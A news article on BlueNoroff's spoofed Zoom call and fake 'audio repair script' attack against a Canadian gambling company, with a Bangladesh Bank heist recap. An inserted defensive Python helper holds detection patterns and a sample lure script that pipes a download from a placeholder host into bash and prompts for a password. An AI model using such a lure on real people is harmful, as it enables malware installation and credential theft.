North Korean Hackers Impersonate Zoom to Breach Gambling Firm

Posted on: June 24, 2025, 08:08h. 

Last updated on: June 24, 2025, 09:22h.

  • Hackers used deepfakes in a spoofed Zoom meeting
  • Victim ran fake support script that installed malware
  • Attackers stole credentials, crypto data, and messaging info

A representative of a Canadian online gambling provider who believed they were conducting a routine Zoom call with a known contact was actually talking to North Korean hackers on a spoofed version of the communications platform.

The North Korea-backed BlueNoroff group created a fake website that looked like an official Zoom support page to target a Canadian gaming company, according to analysts. (Image: Shutterstock)

The unnamed company was hit on May 28 by BlueNoroff, a subgroup of the notorious North Korea-backed hacker group Lazarus Group, according to Field Effect Analysis.

BlueNoroff is a financially motivated threat actor that typically targets banks and crypto exchanges, as well as gaming and entertainment industries, and fintech companies, to raise revenue for North Korea.

The group has stolen more than US$1.3 billion since 2017, largely through SWIFT banking thefts and crypto heists.

Deep Fake

Field Effect said that BlueNoroff created a fake website that looked like an official Zoom support page to target the gaming company. The attackers spoofed a real business contact and set up a Zoom call with the victim using deep-fake technology.

During the Zoom call, the hackers staged “audio issues,” and the victim was told to run a “Zoom audio repair script” to fix the problem. But the script was malware.

Once executed, the script launched a series of downloads and commands, prompting the user for system credentials and silently installing multiple malicious payloads. This allowed the hackers to steal a range of sensitive personal and system data, with a clear focus on cryptocurrency-related assets and messaging data.
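The lure described above hinges on two things a defender can check mechanically before anyone pastes a "support script" into a terminal: whether the page it came from is actually a Zoom-owned domain, and whether the script itself contains the download-and-execute and credential-prompt behaviour the article describes. The following triage helper is an added example written for this article, not code from the original page or from Field Effect; the allowlisted domains, the regex heuristics, and the sample script are all assumptions or constructed data, and the sample is deliberately inert (it points at a reserved `.invalid` hostname).

```python
"""Defender-side triage for a 'Zoom support' URL and a pasted 'repair script'.

Added example for this article; not the article's or Field Effect's code.
The allowlist, the heuristics and the sample script are assumptions / constructed.
"""
import re
from urllib.parse import urlparse

# Assumption: domains the defender treats as genuinely Zoom-owned.
ZOOM_DOMAINS = ("zoom.us", "zoom.com")


def is_legitimate_zoom_host(url: str) -> bool:
    """True only if the URL's host is an allowlisted domain or a subdomain of it.

    A lookalike such as zoom.us.<something>.example ends with ".example",
    not ".zoom.us", so it is rejected even though it starts with "zoom.us".
    """
    host = (urlparse(url).hostname or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in ZOOM_DOMAINS)


# Heuristics for the behaviours the article attributes to the "audio repair script":
# fetching further payloads, prompting for credentials, and persisting silently.
RISKY_PATTERNS = {
    # a download whose output is piped straight into a shell interpreter
    "download_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    # the script asks the user for a password / elevated rights
    "credential_prompt": re.compile(r"(password|\bsudo\b|read\s+-s)", re.I),
    # writes to common autostart locations
    "persistence": re.compile(
        r"(LaunchAgents|LaunchDaemons|crontab\s+-|\.zshrc|\.bashrc)"),
    # decodes an embedded blob and runs it
    "decoded_blob_exec": re.compile(r"base64\s+(-d|--decode)[^\n]*\|"),
}


def triage_script(text: str) -> dict:
    """Return the matched heuristic names and a coarse verdict for a script body."""
    findings = sorted(name for name, rx in RISKY_PATTERNS.items() if rx.search(text))
    return {"findings": findings,
            "verdict": "block" if findings else "no_indicators"}


# Constructed sample of the kind of script a victim might be told to run.
# It is NOT the real lure; the hostname is a reserved .invalid name.
SAMPLE_SCRIPT = """#!/bin/bash
echo "Repairing Zoom audio..."
curl -s https://zoom-audio-fix.example.invalid/fix.sh | bash
read -s -p "Enter your Mac password to finish the repair: " PW
"""

if __name__ == "__main__":
    print(is_legitimate_zoom_host("https://support.zoom.us/hc"))
    print(is_legitimate_zoom_host("https://zoom.us.support-fix.example.invalid/"))
    print(triage_script(SAMPLE_SCRIPT))
```

The domain check is a strict suffix match rather than a substring search, which is what defeats "zoom.us" appearing at the front of an attacker-controlled hostname. The script heuristics are intentionally broad: anything that both fetches remote content into a shell and asks for a password warrants blocking and a call back to the supposed contact over a channel the attacker did not set up.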

The attack appears to be part of a broader Zoom spoofing campaign first spotted in March 2025 that has largely targeted crypto businesses, according to Field Effect.

“It exemplifies an evolving pattern in which financially motivated threat actors continue refining their tradecraft, embedding malicious activity within legitimate business workflows and exploiting user trust as the primary attack surface,” the analysts wrote.

Bangladesh Bank Heist

BlueNoroff’s crowning glory came, notoriously, in February 2016, when the group successfully introduced malware into the servers of the Bangladesh Bank. This helped them obtain credentials to authorize 35 requests for transfers from the New York Fed to accounts in the Philippines and Sri Lanka, totaling almost $1 billion.

Five of the 35 payments, totaling US$101 million, were processed before someone at the New York Fed smelled a rat and blocked further transactions.

Around $20 million ended up in Sri Lanka and was quickly recovered. The rest was transferred to four accounts at Philippine bank RCBC, which had been opened the same day under false names. From there it made its way into the lightly regulated Philippine casino industry where it was laundered at VIP gaming tables, before disappearing without a trace.